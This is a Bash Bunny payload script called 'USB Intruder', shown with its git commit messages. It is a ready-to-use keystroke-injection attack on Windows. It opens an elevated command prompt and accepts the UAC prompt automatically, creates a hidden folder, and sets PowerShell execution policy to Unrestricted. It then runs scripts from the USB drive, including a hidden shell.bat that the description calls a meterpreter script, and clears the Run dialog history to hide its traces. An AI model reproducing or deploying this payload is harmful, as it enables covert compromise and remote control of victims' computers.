Kyle Hoehn 9c527c29c4 Added USB Intruder payload (#220)
* USB Intruder

Initial upload of the USB Intruder v1.1

Tested on Windows 7 and Windows 10.

* USB Intruder

Updated Readme.

Forgot to add a line.

* Update...again...

Added link for forum comments/discussion.

* USB Intruder

USB Intruder v1.1 Commit.
2017-05-18 14:52:54 +10:00

77 lines
1.6 KiB
Bash

#!/bin/bash
#
#TITLE: USB Intruder
#AUTHOR: B0rk
#VERSION: 1.1
#PROPS: Hak5Darren, Diggster, IMcPwn and many more
#OS: Windows (Requires Powershell and Admin privs)
#ATTACKMODES: HID STORAGE
#
#DESCRIPTION: Opens up attack vectors and a meterpreter powershell script on a Victim PC. **Based on usb_exfiltrator by DK & Friends**
#
#LED INDICATORS:
#White - Initialization
#Blue Blinking - HID/STORAGE Phase
#Yellow Blinking - Cleanup
#Green Blinking - Syncing BB for removal
#Green - Attack Completion
#Initialization - Setting AttackModes
LED W
ATTACKMODE HID STORAGE
#Initialization Completed
#Beginning of HID/STORAGE Phase
LED B 10
#Description::
Q DELAY 2000
Q GUI d
Q DELAY 100
Q GUI r
Q DELAY 500
Q STRING powershell -Command "Start-Process cmd -Verb RunAs"
Q ENTER
Q DELAY 1000
Q ALT y
Q DELAY 800
Q STRING mkdir C:\\Windows\\ProgData
Q ENTER
Q STRING attrib +h C:\\Windows\\ProgData
Q ENTER
Q STRING powershell
Q ENTER
Q DELAY 800
Q STRING Set-ExecutionPolicy Unrestricted
Q ENTER
Q STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
Q ENTER
Q DELAY 2000
Q STRING cd \$Env:WinDir\\ProgData
Q ENTER
Q STRING .\\seq1.ps1
Q ENTER
Q DELAY 1000
Q STRING powershell -WindowStyle Hidden \$Env:WinDir\ProgData\shell.bat
Q ENTER
Q STRING exit
Q ENTER
Q STRING exit
Q ENTER
Q DELAY 500
#End of HID/STORAGE Phase
#Cleanup
LED Y 100
#Clears complete run history
Q GUI r
Q DELAY 500
Q STRING powershell -WindowStyle Hidden Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
Q ENTER
#End of Cleanup
#Completion of script
LED G 100
sync
LED G
#Completed